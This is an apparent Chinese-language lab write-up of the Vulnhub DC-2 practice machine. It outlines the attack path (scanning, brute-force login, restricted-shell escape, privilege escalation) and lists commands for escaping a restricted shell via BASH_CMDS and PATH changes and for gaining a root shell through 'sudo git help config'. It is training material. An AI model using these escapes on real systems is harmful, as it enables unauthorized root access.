Vulnhub——DC-2渗透

一、涉及漏洞类型

CMS漏洞

暴力破解

绕过受限shell

git提权

二、渗透思路

主机发现 => 端口扫描 => 访问web服务 => 拿到flag1 => 暴破登录 => 拿到flag2 => ssh登录 => 拿到flag3 => 绕过受限shell => 拿到flag4 => git提权 => 拿到最终flag

三、学到知识点

1.

compgen -c

查看当前可使用的命令

2.绕过Restricted Shell

BASH_CMDS[a]=/bin/sh ; a  #调用/bin/sh命令解释器
/bin/bash   #使用bash命令解释器
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin  #设置环境变量

3.git提权

方法一:
sudo git help config
!/bin/sh

 四、参考

 https://www.cnblogs.com/chenk0/articles/15527053.html

 https://blog.csdn.net/weixin_45605352/article/details/119416935

靶机渗透CMS漏洞暴力破解权限提升

相关

Cento7 将每小时SSH暴力破解(登陆失败)超过10次的ip加入系统黑名单----系统安全篇

DC3靶机渗透

DC3靶机渗透

odoo 防暴力破解_on_login_cooldown

centos 7/8 系统内核升级 4.19->5.16 Linux 内核权限提升漏洞(CVE-2022-0847)

Windows下ZIP加密暴力破解方法,亲测

kali暴力破解wifi密码

pikachu靶场-暴力破解

配置服务器SSH PAM防止暴力破解

标签